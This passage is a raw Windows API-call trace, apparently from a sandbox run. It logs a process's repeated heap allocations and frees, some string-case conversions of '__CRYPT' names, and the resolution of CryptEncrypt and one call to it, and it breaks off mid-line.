[0219.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0219.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0219.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0219.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0219.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0219.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0219.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0219.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0219.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0219.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0219.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0219.813] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0219.813] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0219.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0219.813] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0219.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0219.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0219.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0219.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0219.813] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0219.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0219.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0219.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0219.814] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0219.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0219.814] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0219.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0219.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0219.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0219.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0219.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0219.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0219.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0219.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0219.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0219.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0219.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0219.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0219.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0219.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0219.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0219.815] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0219.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0219.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0219.815] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0219.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0219.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0219.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0219.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0219.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0219.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0219.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0219.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0219.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0219.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0219.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0219.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0219.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0219.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0219.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0219.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0219.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0219.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0219.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0219.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0219.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0219.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf038) returned 0x2e8f370 [0219.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0219.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8f370 | out: hHeap=0x970000) returned 1 [0219.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0219.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0219.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0219.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0219.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0219.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0219.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0219.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x3be0e78 [0219.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0219.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0219.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0219.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0219.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0219.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0219.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0219.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0219.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0219.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0219.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0219.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0219.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0219.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0219.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0219.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0219.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0219.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0219.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0219.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0219.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0219.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0219.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0219.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0219.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0219.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0219.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0219.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0219.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0219.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0219.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0219.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0219.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0219.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0219.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0219.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0219.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0219.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0219.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0219.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0219.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0219.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0219.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0219.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0219.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0219.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0219.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0219.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0219.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0219.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0219.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51508, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0219.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0219.885] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0219.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0219.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0219.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0219.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0219.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0219.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0219.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0219.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0219.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0219.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0219.886] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xf038, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xf040) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0219.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 